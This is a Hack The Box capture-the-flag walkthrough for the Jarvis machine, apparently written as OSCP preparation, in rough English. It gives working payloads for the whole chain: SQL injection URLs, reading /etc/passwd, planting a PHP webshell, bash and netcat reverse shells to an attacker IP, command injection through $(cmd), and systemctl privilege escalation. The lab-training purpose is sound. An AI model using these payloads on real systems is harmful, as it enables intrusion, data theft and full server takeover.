OSCP PREPROTİONS – HTB Jarvis

Jarvis machine is a vulnerable machine with Linux operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the network scan, we have detected many ports, let’s enumerate through the popular port 80.

22/tcp OpenSSH 7.4p1, 80/tcp http Apache httpd, and 64999/tcp ports were found to be open.
Go buster scan

Web enumeration

Source code analysis

We provided web enmueration in the source code and we did not get any results in the wepanalyzer section.
We ran a scan with gobuster to detect hidden files and directories.

There is no related attractive directory other than the phpadmin directory, we note it for now and continue.
We check the input field and url fields on the web.
We encounter /room.php again, which we detected in Gobuster, where the url part is in a remarkable get request. And it returns an answer with cod=.

Here we tried code injection in the input field, we were not successful. When we did the Sql injection, we did not bring anything different again, we did not bring only images and descriptions, that is, an empty response came

Here we will return true flase value to understand that there is sql injection.
That is;
false
http://10.10.10.143/room.php?cod=1 and 1=2 — – –

true

http://10.10.10.143/room.php?cod=1 and 1=1 — –

As we can see, the response came to us successfully at true value
Here, let’s see how to extract information after making sure of sql injection.
We use ORDER BY sytanx to find the number of columns. Here, we realized that there are 7 columns since there are up to 7 columns.
http://10.10.10.143/room.php?cod=1 order by 8
Now we can use union based queries to find injectable columns.
http://10.10.10.143/room.php?cod=-1 union select 1,2,3,4,4,5,6,7

Let’s check the database version and the user we are running.
http://10.10.10.143/room.php?cod=-1 union select 1,database(),user(),4,5,6,7

The server is MariaDB and is running using DBadmin.
Let’s see if we can read a file using the load_file() function.
http://10.10.10.143/room.php?cod=-1 union select 1,load_file(‘/etc/passwd’),3,4,5,6,7

We were able to read it, now let’s try to write webshell
http://10.10.10.143/room.php?cod=-1 union select 1,”,3,4,5,6,7 into outfile ‘/var/www/html/pwned.php’

After installing this command, we can run our commands with exec parameters using curl.
curl -X POST http://10.10.10.143/pwned.php –data-urlencode exec=whoami

Super now here we are writing our command that will give revershell and we are listening before sending it.
curl -X POST http://10.10.10.143/pwned.php –data-urlencode ‘exec=bash -c “bash -i >& /dev/tcp/10.10.14.19/4747 0>&1″‘

We got our Shell

We have seen that our authorizations are very limited here. Therefore we provide local enumeration.

We found that /var/www/Admin-Utilities/simpler.py scrpiti is a script file that can be run with root privileges. We analyzed this file.
Looking at scrpiti, we see that it takes an IP address using the -p argument and then uses os.system() to execute the ping. Several characters (& ; – ` |) are blocked by the script to prevent injection. However the characters ‘$’, ‘(‘ and ‘)’ are not blocked. This will allow us to inject commands via bash command replacement, i.e. “$(cmd)”. Let’s check if it works using the script.

Here we tried something that we can njection outside the ip
By typing the command $(whoami) here the pepper user is provided with feedback

Let’s take action here that will give us a shell

We got our shell here.
We got our user flag but we did not have root authorization.
To detect non-default SUID files here find / -perm -4000 2>/dev/null
We used the command.

We encountered /bin/systemctl. The /bin/systemctl file is used to manage services. Let’s see if there is an impact upgrade related to systemctl via gtfobins.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF

We’ve flattened your commune. It’s like this.

echo '[Service]
Type=notify
ExecStart=/bin/sh -c "nc -e /bin/bash 10.10.14.19 4700"
KillMode=process
Restart=on-faillure
RestartSec=42s
[Install]
WantedBy=multi-user.target'  > new.service

sudo systemctl link /home/pepper/new.service

sudo systemctl start new

So we asked it to give us revershell and then it gave us revershell by running systemctl and we lede root privileges.